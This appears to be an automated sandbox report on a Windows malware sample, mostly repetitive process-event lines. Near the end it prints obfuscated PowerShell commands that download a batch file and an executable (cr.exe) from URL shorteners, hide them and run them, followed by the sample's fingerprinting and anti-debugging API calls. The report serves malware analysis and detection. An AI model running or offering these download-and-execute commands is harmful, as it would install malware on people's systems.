      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2960 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3044 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2480 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCD2 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCD2
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0045F42D FindFirstFileExW,24_2_0045F42D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DCF2 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_0043DCF2
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043DE3D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_0043DE3D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002AE08D GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,24_2_002AE08D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002CF67D FindFirstFileExW,24_2_002CF67D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF22 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF22
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002ADF42 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,24_2_002ADF42
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00434AFC __EH_prolog,GetLogicalDriveStringsA,24_2_00434AFC
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_004365E1 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,24_2_004365E1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: powershell.exe, 0000000E.00000002.2143327246.000000000035B000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00446061
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,24_2_00423778
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044663D mov eax, dword ptr fs:[00000030h] 24_2_0044663D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459A7D mov eax, dword ptr fs:[00000030h] 24_2_00459A7D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459A39 mov eax, dword ptr fs:[00000030h] 24_2_00459A39
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00459AAE mov eax, dword ptr fs:[00000030h] 24_2_00459AAE
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00220083 push dword ptr fs:[00000030h] 24_2_00220083
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B688D mov eax, dword ptr fs:[00000030h] 24_2_002B688D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0027092B mov eax, dword ptr fs:[00000030h] 24_2_0027092B
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9C89 mov eax, dword ptr fs:[00000030h] 24_2_002C9C89
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9CFE mov eax, dword ptr fs:[00000030h] 24_2_002C9CFE
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002C9CCD mov eax, dword ptr fs:[00000030h] 24_2_002C9CCD
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00270D90 mov eax, dword ptr fs:[00000030h] 24_2_00270D90
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00409290 __EH_prolog,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,24_2_00409290
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FFB9 SetUnhandledExceptionFilter,24_2_0043FFB9
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_00446061 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_00446061
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0044017B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_0044017B
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FE57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_0043FE57
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B00A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_002B00A7
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B62B1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,24_2_002B62B1
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_002B03CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_002B03CB
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mode.com mode 18,1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'

      Language, Device and Operating System Detection:

      Yara detected Obfuscated Powershell
      Source: Yara match File source: dump.pcap, type: PCAP
      Source: Yara match File source: C:\Users\user\Documents\pd.bat, type: DROPPED
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: 24_2_0043FC7B cpuid 24_2_0043FC7B
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,WaitForSingleObject,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,24_2_00425760
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_0046207E
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_00462033
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_00462119
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,24_2_004621A4
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,24_2_004623F7
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,24_2_0046251D
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,24_2_004365E1
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,24_2_00458604
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,24_2_00462623
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,24_2_004626F2
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,24_2_00461D91
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_00457FD7
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: GetLocaleInfoW,24_2_00461F8C
      Source: C:\Users\user\AppData\Roaming\cr.exe Code function: EnumSystemLocalesW,24_2_002C8227
